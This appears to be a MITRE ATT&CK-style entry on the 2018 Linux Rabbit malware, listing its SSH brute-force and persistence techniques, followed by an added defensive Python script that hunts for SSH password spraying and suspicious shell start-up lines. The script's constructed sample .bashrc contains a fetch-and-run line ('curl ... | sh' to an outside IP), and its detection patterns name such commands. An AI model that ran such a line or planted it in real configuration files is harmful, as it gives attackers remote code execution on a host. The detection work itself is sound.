Linux Rabbit is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.[1]
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1546.004 | Event Triggered Execution: Unix Shell Configuration Modification | Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.[1] |
| Enterprise | T1133 | External Remote Services | Linux Rabbit attempts to gain access to the server via SSH.[1] |
| Enterprise | T1132 | Data Encoding | Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.[1] |
| Enterprise | T1110.003 | Brute Force: Password Spraying | Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server.[1] |
| Enterprise | T1078 | Valid Accounts | Linux Rabbit acquires valid SSH accounts through brute force.[1] |
| Enterprise | T1033 | System Owner/User Discovery | Linux Rabbit opens a socket on port 22 and, if it receives a response, attempts to obtain the machine's hostname and top-level domain.[1] |
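The SSH brute-force (T1110.003), valid-account (T1078) and shell-configuration persistence (T1546.004) rows above describe behaviour that leaves traces in sshd's auth log and in rc.local / .bashrc. The script below is an added example of hunting for those traces; it is not code from the original page or from the report it cites. The auth.log lines, .bashrc contents, IP addresses and file names are constructed samples, and the thresholds and indicator regexes are assumptions chosen for illustration, not signatures taken from the Linux Rabbit campaign.

```python
"""Hunting helpers for the Linux Rabbit TTPs (added example, not from the page).
All sample data below is constructed; thresholds and patterns are assumptions."""
import re
from collections import defaultdict

# OpenSSH failure/success lines as sshd writes them to /var/log/auth.log.
# Real lines carry a syslog prefix, hostname and PID; the regexes ignore those.
_SSH_FAIL = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")
_SSH_OK = re.compile(r"Accepted password for (?P<user>\S+) from (?P<ip>[\d.]+)")


def ssh_failures_by_source(lines):
    """Return {source_ip: {username: failure_count}} from sshd auth log lines."""
    stats = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = _SSH_FAIL.search(line)
        if m:
            stats[m.group("ip")][m.group("user")] += 1
    return stats


def classify_ssh_bruteforce(lines, min_failures=5, spray_min_users=3):
    """Label each source IP: 'spray' (few guesses across many accounts),
    'bruteforce' (many guesses against few accounts) or 'noise'.
    Thresholds are assumptions; tune them to the host's baseline."""
    verdicts = {}
    for ip, users in ssh_failures_by_source(lines).items():
        total = sum(users.values())
        if total < min_failures:
            verdicts[ip] = "noise"
        elif len(users) >= spray_min_users:
            verdicts[ip] = "spray"
        else:
            verdicts[ip] = "bruteforce"
    return verdicts


def accepted_after_failures(lines):
    """(ip, user) pairs that logged in successfully after earlier failures
    from the same IP: the T1078-via-T1110 pattern in the table."""
    failed_ips, hits = set(), []
    for line in lines:
        f = _SSH_FAIL.search(line)
        if f:
            failed_ips.add(f.group("ip"))
            continue
        m = _SSH_OK.search(line)
        if m and m.group("ip") in failed_ips:
            hits.append((m.group("ip"), m.group("user")))
    return hits


# T1546.004: persistence hooks added to shell start-up files. Indicators are
# generic choices for this example, not Linux Rabbit specifics.
_PERSIST_PATTERNS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b", "download piped to shell"),
    (r"base64\s+(-d|--decode)", "base64-decoded payload"),
    (r"(/tmp|/dev/shm|/var/tmp)/\S+", "execution from temp directory"),
    (r"\bnohup\b.*&\s*$", "backgrounded process"),
]


def audit_shell_config(text):
    """Return [(line_no, line, reason)] for suspicious non-comment lines in
    an rc.local or .bashrc file's contents."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pat, reason in _PERSIST_PATTERNS:
            if re.search(pat, stripped):
                hits.append((n, stripped, reason))
                break
    return hits


# Constructed sample input: one spraying IP, one brute-forcing IP that then
# succeeds, one single stray failure.
SAMPLE_AUTH_LOG = [
    f"Oct  3 11:02:{10 + i:02d} web1 sshd[2101]: Failed password for {u} from 203.0.113.7 port 5012{i} ssh2"
    for i, u in enumerate(["root", "invalid user admin", "invalid user pi",
                           "invalid user ubuntu", "invalid user test"])
] + [
    f"Oct  3 11:05:{i:02d} web1 sshd[2188]: Failed password for root from 198.51.100.9 port 4400{i} ssh2"
    for i in range(6)
] + [
    "Oct  3 11:09:41 web1 sshd[2231]: Failed password for invalid user guest from 192.0.2.5 port 39002 ssh2",
    "Oct  3 11:10:03 web1 sshd[2250]: Accepted password for root from 198.51.100.9 port 44010 ssh2",
]

# Constructed ~/.bashrc with two planted persistence lines.
SAMPLE_BASHRC = "\n".join([
    "# ~/.bashrc: executed by bash(1) for non-login shells.",
    "export PATH=$HOME/bin:$PATH",
    "alias ll='ls -alF'",
    "curl -s http://198.51.100.23/x.sh | sh",
    "/tmp/.cache/run.sh &",
])

if __name__ == "__main__":
    print(classify_ssh_bruteforce(SAMPLE_AUTH_LOG))
    print(accepted_after_failures(SAMPLE_AUTH_LOG))
    for n, line, reason in audit_shell_config(SAMPLE_BASHRC):
        print(f".bashrc:{n}: {reason}: {line}")
```

On a live host, feed `classify_ssh_bruteforce` the lines of `/var/log/auth.log` (or `journalctl -u ssh` output) and `audit_shell_config` the contents of `/etc/rc.local` and every user's `.bashrc`; a hit from `accepted_after_failures` is the point at which a password-spraying host turned into a valid account and deserves an immediate credential reset and a look at what that session wrote to disk.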